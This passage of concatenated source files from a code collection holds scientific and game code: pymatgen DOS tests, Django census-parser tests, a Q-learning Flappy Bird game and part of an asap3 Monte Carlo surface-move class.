(np.array(PDOS_F_2px) + np.array(PDOS_F_2py) + np.array(PDOS_F_2pz)).tolist()[ilistel],
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].efermi,
efermi,
)
if __name__ == "__main__":
unittest.main()
|
richardtran415/pymatgen
|
pymatgen/electronic_structure/tests/test_dos.py
|
Python
|
mit
| 32,388
|
[
"pymatgen"
] |
3cfa1d1d86c57a9a8ba0cfa419410527d76c4ea0d52ff6ef928f4577a9c3218b
|
from decimal import Decimal
from django.test import TestCase
from census.meta import ACSMeta, CensusMeta, Census2010Meta
from census.datasources import Census2000, Census2010
from census.data import Value
from census.management.commands import load_census
class MockDatasource(object):
def get_value(self, table, geo_dicts):
return [0, ]
class ParsingTest(TestCase):
def test_trivial_formula(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
self.failUnlessEqual(
'P0010001',
parser.parse('P0010001').table
)
table = parser.parse('P0010001 + P0010002')
self.failUnlessEqual(table.left.table, 'P0010001')
self.failUnlessEqual(table.operation, '+')
self.failUnlessEqual(table.right.table, 'P0010002')
def test_operator_precedence(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
self.failUnlessEqual(
Value(7),
parser.parse('1 + 2 * 3')(None)
)
self.failUnlessEqual(
Value(9),
parser.parse('(1 + 2) * 3')(None)
)
def test_operations(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
self.failUnlessEqual(
Value(4),
parser.parse('2 + 2')(None)
)
self.failUnlessEqual(
Value(0),
parser.parse('2 - 2')(None)
)
self.failUnlessEqual(
Value(6),
parser.parse('2 * 3')(None)
)
self.failUnlessEqual(
Value(2),
parser.parse('4 / 2')(None)
)
def test_unicode(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
table = parser.parse(u'P049013 + P049040\r\n')
self.failUnlessEqual(
'P049013',
table.left.table
)
self.failUnlessEqual(
'P049040',
table.right.table
)
class DataTest(TestCase):
def test_moe_times_value(self):
        # test that if a number with an moe is multiplied by a normal non-estimate
        # number, the moe is simply multiplied by that number
a = Value(10, moe=5)
b = Value(2)
self.failUnlessEqual(
Value(20, moe=10),
a * b
)
self.failUnlessEqual(
Value(20, moe=10),
b * a
)
def test_meta_files(self):
acs_meta = ACSMeta()
self.failUnlessEqual(acs_meta.csv_column_for_matrix('B07401_001'), 6)
census_meta = CensusMeta('SF1')
self.failUnlessEqual(census_meta.csv_column_for_matrix('P001001'), 5)
census_meta = CensusMeta('SF3')
self.failUnlessEqual(census_meta.csv_column_for_matrix('P021001'), 171)
census_2010_sf1_meta = Census2010Meta('sf1')
self.failUnlessEqual(census_2010_sf1_meta.csv_column_for_matrix('P0040002'), 14)
def test_census2000_data(self):
""" Test that the data files are read properly
NOTE: It is advisable to download a locally cached copy of RI's files
(the state these tests are written for) before running, so there are no
network side-effects.
"""
return
# RI total population (2000)
cmd = load_census.Command()
cmd.handle('uSF1', 'ri')
geo = {
'FILEID': 'uSF1',
'SUMLEV': '040',
'STUSAB': 'RI',
'CHARITER': '000',
'CIFSN': '01',
'LOGRECNO': '0000001'
}
c2k = Census2000('SF1')
self.failUnlessEqual(c2k.data('P0001001', geo), Value(1048319))
def test_census2010(self):
""" Test that the data files are read properly, and that operations and
formula are handled correctly.
NOTE: It is advisable to download a locally cached copy of RI's files
(the state these tests are written for) before running, so there are no
network side-effects.
"""
# RI total population (2010)
cmd = load_census.Command()
cmd.handle('SF1ST', 'ri')
geo = {
'FILEID': 'SF1ST',
'SUMLEV': '040',
'STUSAB': 'RI',
'CHARITER': '000',
'CIFSN': '01',
'LOGRECNO': '0000001'
}
c2010sf1 = Census2010('sf1')
self.failUnlessEqual(c2010sf1.data('P00010001', geo), Value(1052567))
self.failUnlessEqual(c2010sf1.data('P00060001', geo), Value(1091043))
self.failUnlessEqual(c2010sf1.data('P00010001-P00060001', geo), Value(1052567 - 1091043))
self.failUnlessEqual(str(c2010sf1.data('P00010001/P00060001', geo).value), str(Decimal(1052567) / Decimal(1091043)))
def test_ratio_moe(self):
""" Test that MOE is calculated properly for ratios/proportions """
v1 = Value(4634, moe=989)
v2 = Value(6440, moe=1328)
result = v1 / v2
# http://www.census.gov/acs/www/Downloads/handbooks/ACSResearch.pdf
# page A-16
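        # For a ratio R = X / Y the handbook's formula is MOE(R) = sqrt(MOE_X**2 + R**2 * MOE_Y**2) / Y;
        # here sqrt(989**2 + 0.72**2 * 1328**2) / 6440 comes out to roughly 0.2135, which is asserted below.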
self.failUnlessEqual(round(result.value, 2), 0.72)
self.failUnlessEqual(round(result.moe, 4), 0.2135)
|
ProvidencePlan/Profiles
|
communityprofiles/census/tests.py
|
Python
|
mit
| 5,287
|
[
"MOE"
] |
11862958cd1524cfbc1564ea724fd265ba6ee03aa62eed0bac22918213ce36f6
|
import argparse
import math
import os
import pickle
import time
from collections import deque
from random import randint
import numpy as np
import pygame
from enum import IntEnum
from pygame.locals import *
from scipy.ndimage.filters import gaussian_filter
########################################################################################################################
parser = argparse.ArgumentParser(description='Q-Learn how to play Flappy Bird')
parser.add_argument('--actor_file', type=str, default='', help='file path to the actor file')
parser.add_argument('--save_file', type=str, default='actor.pickle',
help='file path which you would like to write to (default is actor.pickle)')
parser.add_argument('--speed', type=int, default=1, help='game speed (default 1)')
parser.add_argument('--skip_frames', type=int, default=1,
help='only allow the bird to make decisions on multiples of this frame')
parser.add_argument('--number_of_birds', type=int, default=1,
help='number of birds to play flappy bird with')
parser.add_argument('--random_start_point', type=bool, default=False,
help='use random starting point for bird(s)')
parser.add_argument('--alpha', type=float, default=.9, help='learning rate (0.0 < alpha < 1.0)')
parser.add_argument('--blur_freq', type=int, default=10,
help='the number of runs between each gaussian blur')
parser.add_argument('--sigma', type=float, default=2.0, help='sigma for gaussian blur')
parser.add_argument('--bias', type=bool, default=True,
help='introduce bias in the event of ties to help the bird learn faster')
parser.add_argument('--intercede', type=bool, default=True,
help='do not allow the bird to suicide on floor/ceiling')
args = parser.parse_args()
ACTOR_FILE = args.actor_file
SAVE_FILE = args.save_file
OVERALL_SPEED = args.speed
SKIP_FRAMES = args.skip_frames
NUMBER_OF_BIRDS = args.number_of_birds
RANDOM_START_POINT = args.random_start_point
ALPHA = args.alpha
SIGMA = args.sigma
BLUR_FREQ = args.blur_freq
BIAS = args.bias
INTERCEDE = args.intercede
########################################################################################################################
FPS = 60
ANIMATION_SPEED = 0.18 * args.speed # pixels per millisecond
WIN_WIDTH = 284 * 2 # BG image size: 284x512 px; tiled twice
WIN_HEIGHT = 512
class Bird(pygame.sprite.Sprite):
"""Represents the bird controlled by the player.
The bird is the 'hero' of this game. The player can make it climb
(ascend quickly), otherwise it sinks (descends more slowly). It must
pass through the space in between pipes (for every pipe passed, one
point is scored); if it crashes into a pipe, the game ends.
Attributes:
x: The bird's X coordinate.
y: The bird's Y coordinate.
msec_to_climb: The number of milliseconds left to climb, where a
complete climb lasts Bird.CLIMB_DURATION milliseconds.
Constants:
WIDTH: The width, in pixels, of the bird's image.
HEIGHT: The height, in pixels, of the bird's image.
    SINK_SPEED: The speed, in pixels per millisecond, at which the bird
        descends while not climbing.
    CLIMB_SPEED: The average speed, in pixels per millisecond, at which the
        bird ascends while climbing. See also the Bird.update docstring.
CLIMB_DURATION: The number of milliseconds it takes the bird to
execute a complete climb.
"""
WIDTH = HEIGHT = 32
SINK_SPEED = 0.18 * OVERALL_SPEED
CLIMB_SPEED = 0.3 * OVERALL_SPEED
CLIMB_DURATION = 333.3 / OVERALL_SPEED
def __init__(self, x, y, msec_to_climb, images):
"""Initialise a new Bird instance.
Arguments:
x: The bird's initial X coordinate.
y: The bird's initial Y coordinate.
msec_to_climb: The number of milliseconds left to climb, where a
complete climb lasts Bird.CLIMB_DURATION milliseconds. Use
this if you want the bird to make a (small?) climb at the
very beginning of the game.
images: A tuple containing the images used by this bird. It
must contain the following images, in the following order:
0. image of the bird with its wing pointing upward
1. image of the bird with its wing pointing downward
"""
super(Bird, self).__init__()
self.x, self.y = x, y
self.msec_to_climb = msec_to_climb
self._img_wingup, self._img_wingdown = images
self._mask_wingup = pygame.mask.from_surface(self._img_wingup)
self._mask_wingdown = pygame.mask.from_surface(self._img_wingdown)
self.dead = False
def update(self, delta_frames=1):
"""Update the bird's position.
This function uses the cosine function to achieve a smooth climb:
In the first and last few frames, the bird climbs very little, in the
middle of the climb, it climbs a lot.
One complete climb lasts CLIMB_DURATION milliseconds, during which
the bird ascends with an average speed of CLIMB_SPEED px/ms.
This Bird's msec_to_climb attribute will automatically be
decreased accordingly if it was > 0 when this method was called.
Arguments:
delta_frames: The number of frames elapsed since this method was
last called.
"""
if self.msec_to_climb > 0:
frac_climb_done = 1 - self.msec_to_climb / Bird.CLIMB_DURATION
self.y -= (Bird.CLIMB_SPEED * frames_to_msec(delta_frames) *
(1 - math.cos(frac_climb_done * math.pi)))
self.msec_to_climb -= frames_to_msec(delta_frames)
else:
self.y += Bird.SINK_SPEED * frames_to_msec(delta_frames)
@property
def image(self):
"""Get a Surface containing this bird's image.
This will decide whether to return an image where the bird's
visible wing is pointing upward or where it is pointing downward
based on pygame.time.get_ticks(). This will animate the flapping
bird, even though pygame doesn't support animated GIFs.
"""
if pygame.time.get_ticks() % 500 >= 250:
return self._img_wingup
else:
return self._img_wingdown
@property
def mask(self):
"""Get a bitmask for use in collision detection.
The bitmask excludes all pixels in self.image with a
transparency greater than 127."""
if pygame.time.get_ticks() % 500 >= 250:
return self._mask_wingup
else:
return self._mask_wingdown
@property
def rect(self):
"""Get the bird's position, width, and height, as a pygame.Rect."""
return Rect(self.x, self.y, Bird.WIDTH, Bird.HEIGHT)
def jump(self):
self.msec_to_climb = Bird.CLIMB_DURATION
class PipePair(pygame.sprite.Sprite):
"""Represents an obstacle.
A PipePair has a top and a bottom pipe, and only between them can
the bird pass -- if it collides with either part, the game is over.
Attributes:
x: The PipePair's X position. This is a float, to make movement
smoother. Note that there is no y attribute, as it will only
ever be 0.
image: A pygame.Surface which can be blitted to the display surface
to display the PipePair.
mask: A bitmask which excludes all pixels in self.image with a
transparency greater than 127. This can be used for collision
detection.
top_pieces: The number of pieces, including the end piece, in the
top pipe.
bottom_pieces: The number of pieces, including the end piece, in
the bottom pipe.
Constants:
WIDTH: The width, in pixels, of a pipe piece. Because a pipe is
only one piece wide, this is also the width of a PipePair's
image.
PIECE_HEIGHT: The height, in pixels, of a pipe piece.
ADD_INTERVAL: The interval, in milliseconds, in between adding new
pipes.
"""
WIDTH = 80
PIECE_HEIGHT = 32
ADD_INTERVAL = 3000 / OVERALL_SPEED
def __init__(self, pipe_end_img, pipe_body_img):
"""Initialises a new random PipePair.
The new PipePair will automatically be assigned an x attribute of
float(WIN_WIDTH - 1).
Arguments:
pipe_end_img: The image to use to represent a pipe's end piece.
pipe_body_img: The image to use to represent one horizontal slice
of a pipe's body.
"""
self.passed = set()
self.x = float(WIN_WIDTH - 1)
self.score_counted = set()
self.image = pygame.Surface((PipePair.WIDTH, WIN_HEIGHT), SRCALPHA)
self.image.convert() # speeds up blitting
self.image.fill((0, 0, 0, 0))
total_pipe_body_pieces = int(
(WIN_HEIGHT - # fill window from top to bottom
3 * Bird.HEIGHT - # make room for bird to fit through
3 * PipePair.PIECE_HEIGHT) / # 2 end pieces + 1 body piece
PipePair.PIECE_HEIGHT # to get number of pipe pieces
)
self.bottom_pieces = randint(1, total_pipe_body_pieces)
self.top_pieces = total_pipe_body_pieces - self.bottom_pieces
# bottom pipe
for i in range(1, self.bottom_pieces + 1):
piece_pos = (0, WIN_HEIGHT - i * PipePair.PIECE_HEIGHT)
self.image.blit(pipe_body_img, piece_pos)
bottom_pipe_end_y = WIN_HEIGHT - self.bottom_height_px
self.bottom_pipe_end_y = bottom_pipe_end_y
bottom_end_piece_pos = (0, bottom_pipe_end_y - PipePair.PIECE_HEIGHT)
self.image.blit(pipe_end_img, bottom_end_piece_pos)
# top pipe
for i in range(self.top_pieces):
self.image.blit(pipe_body_img, (0, i * PipePair.PIECE_HEIGHT))
top_pipe_end_y = self.top_height_px
self.top_pipe_end_y = top_pipe_end_y
self.image.blit(pipe_end_img, (0, top_pipe_end_y))
# compensate for added end pieces
self.top_pieces += 1
self.bottom_pieces += 1
# for collision detection
self.mask = pygame.mask.from_surface(self.image)
@property
def top_height_px(self):
"""Get the top pipe's height, in pixels."""
return self.top_pieces * PipePair.PIECE_HEIGHT
@property
def bottom_height_px(self):
"""Get the bottom pipe's height, in pixels."""
return self.bottom_pieces * PipePair.PIECE_HEIGHT
@property
def visible(self):
"""Get whether this PipePair on screen, visible to the player."""
return -PipePair.WIDTH < self.x < WIN_WIDTH
@property
def rect(self):
"""Get the Rect which contains this PipePair."""
return Rect(self.x, 0, PipePair.WIDTH, PipePair.PIECE_HEIGHT)
def update(self, delta_frames=1):
"""Update the PipePair's position.
Arguments:
delta_frames: The number of frames elapsed since this method was
last called.
"""
self.x -= ANIMATION_SPEED * frames_to_msec(delta_frames)
def collides_with(self, bird):
"""Get whether the bird collides with a pipe in this PipePair.
Arguments:
bird: The Bird which should be tested for collision with this
PipePair.
"""
return pygame.sprite.collide_mask(self, bird)
def load_images():
"""Load all images required by the game and return a dict of them.
The returned dict has the following keys:
background: The game's background image.
bird-wingup: An image of the bird with its wing pointing upward.
Use this and bird-wingdown to create a flapping bird.
bird-wingdown: An image of the bird with its wing pointing downward.
Use this and bird-wingup to create a flapping bird.
pipe-end: An image of a pipe's end piece (the slightly wider bit).
Use this and pipe-body to make pipes.
pipe-body: An image of a slice of a pipe's body. Use this and
        pipe-end to make pipes.
"""
def load_image(img_file_name):
"""Return the loaded pygame image with the specified file name.
This function looks for images in the game's images folder
(./images/). All images are converted before being returned to
speed up blitting.
Arguments:
img_file_name: The file name (including its extension, e.g.
'.png') of the required image, without a file path.
"""
file_name = os.path.join('.', 'images', img_file_name)
img = pygame.image.load(file_name)
img.convert()
return img
return {'background': load_image('background.png'),
'pipe-end': load_image('pipe_end.png'),
'pipe-body': load_image('pipe_body.png'),
# images for animating the flapping bird -- animated GIFs are
# not supported in pygame
'bird-wingup': load_image('bird_wing_up.png'),
'bird-wingdown': load_image('bird_wing_down.png')}
def frames_to_msec(frames, fps=FPS):
"""Convert frames to milliseconds at the specified framerate.
Arguments:
frames: How many frames to convert to milliseconds.
fps: The framerate to use for conversion. Default: FPS.
"""
return 1000.0 * frames / fps
def msec_to_frames(milliseconds, fps=FPS):
"""Convert milliseconds to frames at the specified framerate.
Arguments:
milliseconds: How many milliseconds to convert to frames.
fps: The framerate to use for conversion. Default: FPS.
"""
return fps * milliseconds / 1000.0
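# For example, at the default 60 FPS, frames_to_msec(60) returns 1000.0 and msec_to_frames(500) returns 30.0.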
class Action(IntEnum):
STILL = 0
JUMP = 1
step_r = 3
step_c = 3
actions = 2
height = int((WIN_HEIGHT / step_r) * 2) + 1
width = int(((WIN_WIDTH / step_c) * 2) + PipePair.WIDTH) + 1
bird_heights = 3
pipe_heights = 3
is_jumping = 2
dimensions = (actions, height, width, bird_heights, pipe_heights, is_jumping)
Q = np.full(dimensions, 0, dtype=np.float32)
V = np.full(dimensions, 1, dtype=np.int)
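# Q holds the estimated value of each action in each discretised state; V counts how often each
# (action, state) pair has been visited and feeds the 8 / V exploration bonus used in Actor.act below.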
def get_state(actor):
top_y = actor.next_pipe.top_pieces * PipePair.PIECE_HEIGHT
bottom_y = WIN_HEIGHT - actor.next_pipe.bottom_pieces * PipePair.PIECE_HEIGHT
delta_y = int(((top_y + bottom_y) / 2) - actor.bird.y)
delta_x = int((actor.next_pipe.x + PipePair.WIDTH) - actor.bird.x)
bird_lmh = int(actor.bird.y / (WIN_HEIGHT / 3))
pipe_lmh = int(((top_y + bottom_y) / 2) / (WIN_HEIGHT / 3))
is_jumping = int(actor.bird.msec_to_climb > 0)
bird_lmh = min(bird_lmh, 2)
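    # State: vertical offset of the pipe-gap centre from the bird, horizontal distance to the trailing
    # edge of the next pipe, which third of the screen the bird and the gap centre fall in, and whether
    # the bird is currently climbing.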
return delta_y, delta_x, bird_lmh, pipe_lmh, is_jumping
class Actor:
def __init__(self, bird):
self.bird = bird
self.last_state = None
self.action = None
self.done = False
self.next_pipe = None
self.pipes_passed = 0
def act(self, state):
        # Consult the Q matrix and pick the action that has the highest value (plus an exploration bonus)
state = self._state_index(state)
still_state = (Action.STILL,) + state
jump_state = (Action.JUMP,) + state
jump = Q[jump_state] + float(8 / V[jump_state])
still = Q[still_state] + float(8 / V[still_state])
if jump > still:
action = Action.JUMP
elif still > jump:
action = Action.STILL
else:
if BIAS:
bottom_y = WIN_HEIGHT - self.next_pipe.bottom_pieces * PipePair.PIECE_HEIGHT
top_y = self.next_pipe.top_pieces * PipePair.PIECE_HEIGHT
bird_lmh = int(self.bird.y / (WIN_HEIGHT / 3))
pipe_lmh = int(((top_y + bottom_y) / 2) / (WIN_HEIGHT / 3))
if bird_lmh > pipe_lmh:
action = Action.JUMP
elif bird_lmh < pipe_lmh:
action = Action.STILL
else:
action = Action.STILL
else:
if V[jump_state] < V[still_state]:
return Action.JUMP
else:
return Action.STILL
if INTERCEDE:
# Intercede on the bird's behalf to stop it from dying.
if (self.bird.y - Bird.CLIMB_DURATION * Bird.CLIMB_SPEED) <= 0:
action = Action.STILL
if self.bird.y + (Bird.SINK_SPEED * SKIP_FRAMES * frames_to_msec(1)) >= WIN_HEIGHT - self.bird.HEIGHT:
action = Action.JUMP
V[(action,) + state] += 1
if action == Action.JUMP:
self.bird.jump()
return action
def learn(self, old_state, new_state, action, reward):
# Consult the matrix and adjust the value at the appropriate position
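        # This is the standard Q-learning update with a discount factor of 1:
        #   Q(s, a) <- (1 - ALPHA) * Q(s, a) + ALPHA * (reward + max_a' Q(s', a'))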
old = (action,) + (self._state_index(old_state))
new = (self._state_index(new_state))
y, x, bird_lmh, pipe_lmh, is_jumping = new
max_value = max(Q[:, y, x, bird_lmh, pipe_lmh, is_jumping])
Q[old] = (1 - ALPHA) * Q[old] + ALPHA * (reward + max_value)
@staticmethod
def _state_index(state):
"""
        Given a state in the form (delta_y, delta_x, bird_lmh, pipe_lmh, is_flapping), return the adjusted
        form of these values such that they can be used as indices into Q and V.
"""
delta_y, delta_x, bird_lmh, pipe_lmh, is_flapping = state
actions, height, width, _, _, _ = Q.shape
y = int((height / 2) + (delta_y / step_r) - 1)
x = int((width / 2) + (delta_x / step_c) - 1)
return y, x, bird_lmh, pipe_lmh, is_flapping
def main():
global Q, V
pygame.init()
display_surface = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
pygame.display.set_caption('Pygame Flappy Bird')
clock = pygame.time.Clock()
score_font = pygame.font.SysFont(None, 32, bold=True) # default font
images = load_images()
# the bird stays in the same x position, so bird.x is a constant
# center bird on screen
if not ACTOR_FILE == '':
if os.path.exists(ACTOR_FILE):
print('Reading actor from file.')
with open(ACTOR_FILE, 'rb') as handle:
Q, V = pickle.load(handle)
else:
print(ACTOR_FILE, 'does not exist.')
score = 0.0
runs = 0.0
max_pipes_passed = 0
pipes_passed = 0
while True:
runs += 1
if runs % BLUR_FREQ == 0:
Q = gaussian_filter(Q, sigma=SIGMA)
print('{0:15}: AVERAGE_PIPES: {1:>15.2f} \t RUN_PIPES: {3:>5} \t OVERALL: {2:>5}'.format(int(runs), (
(score / runs) / NUMBER_OF_BIRDS), max_pipes_passed, pipes_passed))
birds = []
for b in range(NUMBER_OF_BIRDS):
x = 50
if RANDOM_START_POINT:
y = randint(Bird.HEIGHT, WIN_HEIGHT - 100)
else:
y = int(WIN_HEIGHT / 2 - Bird.HEIGHT / 2)
birds.append(Actor(Bird(x, y, 2, (images['bird-wingup'], images['bird-wingdown']))))
pipes = deque()
frame_clock = 0 # this counter is only incremented if the game isn't paused
done = paused = False
while not done:
clock.tick(FPS)
# Handle this 'manually'. If we used pygame.time.set_timer(),
# pipe addition would be messed up when paused.
if not (paused or frame_clock % msec_to_frames(PipePair.ADD_INTERVAL)):
pp = PipePair(images['pipe-end'], images['pipe-body'])
pipes.append(pp)
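# Point each bird at the nearest pipe ahead of it; once the front pipe has
# been passed (its right edge is behind the bird), switch to the next pipe
# in the deque.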
for actor_bird in birds:
actor_bird.next_pipe = pipes[0]
if len(pipes) > 1 and (actor_bird.next_pipe.x + PipePair.WIDTH) - actor_bird.bird.x < 0:
actor_bird.next_pipe = pipes[1]
for e in pygame.event.get():
if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):
done = True
break
elif e.type == KEYUP and e.key in (K_PAUSE, K_p):
paused = not paused
elif e.type == KEYUP and e.key == K_s:
print('{}- Writing actor to file'.format(time.strftime("%I:%M:%S")))
with open(SAVE_FILE, 'wb') as handle:
pickle.dump((Q, V), handle)
elif e.type == MOUSEBUTTONUP or (e.type == KEYUP and e.key in (K_UP, K_RETURN, K_SPACE)):
for actor_bird in birds:
actor_bird.bird.jump()
if paused:
continue
for actor_bird in birds:
if actor_bird.last_state is None:
actor_bird.last_state = get_state(actor_bird)
if frame_clock % SKIP_FRAMES == 0:
for actor_bird in birds:
if not actor_bird.bird.dead:
actor_bird.action = actor_bird.act(actor_bird.last_state)
# check for collisions
all_dead = True
for actor_bird in birds:
bird = actor_bird.bird
pipe_collision = any(p.collides_with(bird) for p in pipes)
if pipe_collision or 0 >= bird.y or bird.y >= WIN_HEIGHT - Bird.HEIGHT:
bird.dead = True
if not bird.dead:
all_dead = False
pipes_passed = 0
if all_dead:
done = True
for bird_actor in birds:
pipes_passed = max(pipes_passed, bird_actor.pipes_passed)
max_pipes_passed = max(max_pipes_passed, bird_actor.pipes_passed)
for x in (0, WIN_WIDTH / 2):
display_surface.blit(images['background'], (x, 0))
while pipes and not pipes[0].visible:
pipes.popleft()
for p in pipes:
p.update()
display_surface.blit(p.image, p.rect)
for actor_bird in birds:
actor_bird.bird.update()
bird = actor_bird.bird
if frame_clock % SKIP_FRAMES == 0 or bird.dead:
state = get_state(actor_bird)
delta_y, delta_x, bird_lmh, pipe_lmh, is_jumping = state
distance_to_pipe = math.hypot(delta_x, delta_y)
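# Reward shaping, as implemented below: a small positive reward for staying
# alive that grows as the bird approaches the pipe gap, a large bonus for
# passing a pipe, a penalty for dying that grows with distance from the gap,
# and an extra penalty for leaving the screen.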
reward = 0.0
if not actor_bird.done:
if not bird.dead:
reward += 1.0 + (15.0 / (distance_to_pipe + .1))
if (pipes[0].x + PipePair.WIDTH) - bird.x < 0 and id(bird) not in pipes[0].passed:
actor_bird.pipes_passed += 1
pipes[0].passed |= {id(bird)}
reward += 10000.0
if bird.dead:
reward -= 1000.0 + (.5 * distance_to_pipe)
if bird.y <= 0 or bird.y > 485:
reward -= 10000.0
actor_bird.learn(actor_bird.last_state, state, actor_bird.action, reward)
if bird.dead:
actor_bird.done = True
actor_bird.last_state = state
if not bird.dead:
display_surface.blit(bird.image, bird.rect)
# update and display score
for p in pipes:
for actor_bird in birds:
bird = actor_bird.bird
if not bird.dead:
if p.x + PipePair.WIDTH < bird.x and bird not in p.score_counted:
p.score_counted |= {bird}
score += 1
for actor_bird in birds:
pipes_passed = max(pipes_passed, actor_bird.pipes_passed)
score_surface = score_font.render(str(pipes_passed), True, (255, 255, 255))
score_x = WIN_WIDTH / 2 - score_surface.get_width() / 2
display_surface.blit(score_surface, (score_x, PipePair.PIECE_HEIGHT))
pygame.display.flip()
frame_clock += 1
print('Game over! Score: %i' % score)
pygame.quit()
if __name__ == '__main__':
main()
|
EthanWelsh/Flappy-Bird
|
flappybird.py
|
Python
|
mit
| 24,151
|
[
"Gaussian"
] |
cd48fc53f1c7e04e7b6c842de322038798700342992a3dd154f8d88e025f9024
|
import numpy as np
from asap3 import FullNeighborList
from asap3.MonteCarlo.Moves.Data import lattice as latticedata
from asap3.MonteCarlo.Moves.Base import Move, RandChoice
from ase.cluster.cluster import Cluster
class SurfaceMove(Move):
def __init__(self, debug=0):
self.debug = debug
self.surface_i = -1
self.vacant_i = -1
Move.__init__(self)
def set_atoms(self, atoms):
Move.set_atoms(self, atoms)
if not isinstance(atoms, Cluster):
raise Warning('The cluster is not a valid Cluster instance.')
if atoms.symmetry != 'fcc':
raise Warning('Can only work with fcc structures.')
self.natoms = len(atoms)
# Get the structural parameters
sym = atoms.symmetry
self.neighbor_positions = (latticedata[sym]['neighbor_positions'] *
atoms.lattice_basis[0, 0])
self.neighbor_cutoff = (latticedata[sym]['neighbor_cutoff'] *
atoms.lattice_basis[0, 0])
self.neighbor_numbers = latticedata[sym]['neighbor_numbers']
self.neighbor_mapping = latticedata[sym]['neighbor_mapping']
self.neighbor_count = latticedata[sym]['neighbor_count']
self.type_count = latticedata[sym]['type_count']
self.type_names = latticedata[sym]['type_names']
self.type_numbers = latticedata[sym]['type_numbers']
self.type_data = latticedata[sym]['type_data']
# Set neighbors, coordination and type for all atoms
get_neighbors = FullNeighborList(self.neighbor_cutoff, atoms)
positions = atoms.get_positions()
neighbors = []
coordinations = []
types = []
for i, pos in enumerate(positions):
nl = get_neighbors[i]
dl = (positions[nl] - pos) / atoms.lattice_basis[0, 0]
neighbors.append([-1] * self.neighbor_count)
for n, d in zip(nl, dl):
name = tuple(d.round(1))
if name in self.neighbor_numbers:
neighbors[i][self.neighbor_numbers[name]] = n
coordinations.append(self.get_atom_coordination(neighbors[i]))
types.append(self.get_atom_type(neighbors[i]))
self.positions = positions
self.neighbors = np.array(neighbors, dtype=int)
self.coordinations = np.array(coordinations, dtype=int)
self.types = np.array(types, dtype=int)
# Generate vacancies (position, neighbors, coordination and type)
self.vacant_positions = np.zeros((0, 3), dtype=float)
self.vacant_neighbors = np.zeros((0, self.neighbor_count), dtype=int)
self.vacant_coordinations = np.zeros(0, dtype=int)
self.vacant_types = np.zeros(0, dtype=int)
for i in self.surface_indexes():
self.add_vacancies(self.positions[i], self.neighbors[i], i)
if self.debug > 2:
if self.check_vacancies():
raise Warning('Something is wrong, read the message above')
def __call__(self, atoms):
self.chose()
self.backup(self.surface_i)
atoms[self.surface_i].position = self.vacant_positions[self.vacant_i].copy()
def chose(self):
# Choose a surface atom to move and where to move it
surface_i = RandChoice(self.surface_indexes())
self_neighbor = True
while self_neighbor:
vacant_i = RandChoice(self.vacant_indexes())
# The atom must not move to a site where its only neighbor is itself.
# If at least one other neighbor is found then the site is fine => break
for n in self.vacant_neighbors[vacant_i]:
if n != -1 and n != surface_i:
self_neighbor = False
break
self.surface_i = surface_i
self.vacant_i = vacant_i
def accept(self):
# Save the old position, neighbors, type and coordination
old_position = self.positions[self.surface_i].copy()
old_neighbors = self.neighbors[self.surface_i].copy()
old_coordination = self.coordinations[self.surface_i].copy()
old_type = self.types[self.surface_i].copy()
# Set the position, neighbors, type and coordination
new_position = self.vacant_positions[self.vacant_i].copy()
new_neighbors = self.vacant_neighbors[self.vacant_i].copy()
new_coordination = self.vacant_coordinations[self.vacant_i].copy()
new_type = self.vacant_types[self.vacant_i].copy()
self.positions[self.surface_i] = new_position
self.neighbors[self.surface_i] = new_neighbors
self.coordinations[self.surface_i] = new_coordination
self.types[self.surface_i] = new_type
# Add "surface_i" in the new neighbors neighborlists
for j, n in enumerate(new_neighbors):
if n >= 0 and n != self.surface_i:
self.neighbors[n][self.neighbor_mapping[j]] = self.surface_i
self.coordinations[n] += 1
self.types[n] = self.get_atom_type(self.neighbors[n])
elif n == self.surface_i:
self.neighbors[n][j] = -1
self.coordinations[n] -= 1
self.types[n] = self.get_atom_type(self.neighbors[n])
# Set "-1" in the old neighbors neighborlists
for j, n in enumerate(old_neighbors):
if n >= 0:
self.neighbors[n][self.neighbor_mapping[j]] = -1
self.coordinations[n] -= 1
self.types[n] = self.get_atom_type(self.neighbors[n])
# Add the old and remove the new position
self.remove_vacancy(self.vacant_i)
self.add_vacancy(old_position,
old_neighbors,
old_coordination,
old_type)
# Update vacancies around the moved atom old and new position
self.remove_vacancies(self.surface_i)
self.add_vacancies(self.positions[self.surface_i],
self.neighbors[self.surface_i],
self.surface_i)
# Print that an atom is being moved
if self.debug:
print (">> Moving atom %i (%2.2f %2.2f %2.2f) " %
(self.surface_i, old_position[0],
old_position[1], old_position[2]) +
"to vacancy %i (%2.2f %2.2f %2.2f):" %
(self.vacant_i, new_position[0],
new_position[1], new_position[2]))
if self.debug > 2:
check_vacancies = self.check_vacancies()
check_neighbors = self.check_neighbors()
if check_vacancies or check_neighbors:
raise Warning('Something is wrong, read messages above')
# Manipulation functions for vacancies
def add_vacancy(self, position, neighbors, coordination, type):
"""Adds a single vacancy, without updating any lists."""
if self.debug:
print ("Adding vacancy %i (%2.2f %2.2f %2.2f)" %
(len(self.vacant_positions), position[0], position[1], position[2]))
self.vacant_positions = np.append(self.vacant_positions,
position.reshape(1, 3),
axis=0)
self.vacant_neighbors = np.append(self.vacant_neighbors,
neighbors.reshape(1, self.neighbor_count),
axis=0)
self.vacant_coordinations = np.append(self.vacant_coordinations,
coordination)
self.vacant_types = np.append(self.vacant_types,
type)
def remove_vacancy(self, index):
"""Removes a single vacancy, without updating any lists."""
if self.debug:
position = self.vacant_positions[index]
print ("Removing vacancy %i (%2.2f %2.2f %2.2f)" %
(index, position[0], position[1], position[2]))
self.vacant_positions = np.delete(self.vacant_positions, index, axis=0)
self.vacant_neighbors = np.delete(self.vacant_neighbors, index, axis=0)
self.vacant_coordinations = np.delete(self.vacant_coordinations, index)
self.vacant_types = np.delete(self.vacant_types, index)
def add_vacancies(self, position, neighbors, index):
"""Adds and updates vacancies associated with the atom
at "position" indexed with "index". It will only add a
vacancy if it is not already present in the list of
vacancies."""
for i, n in enumerate(neighbors):
if n < 0:
vacant_position = position + self.neighbor_positions[i]
vacant_append = True
for j, vp in enumerate(self.vacant_positions):
if (np.abs(vp - vacant_position) < 1e-3).all():
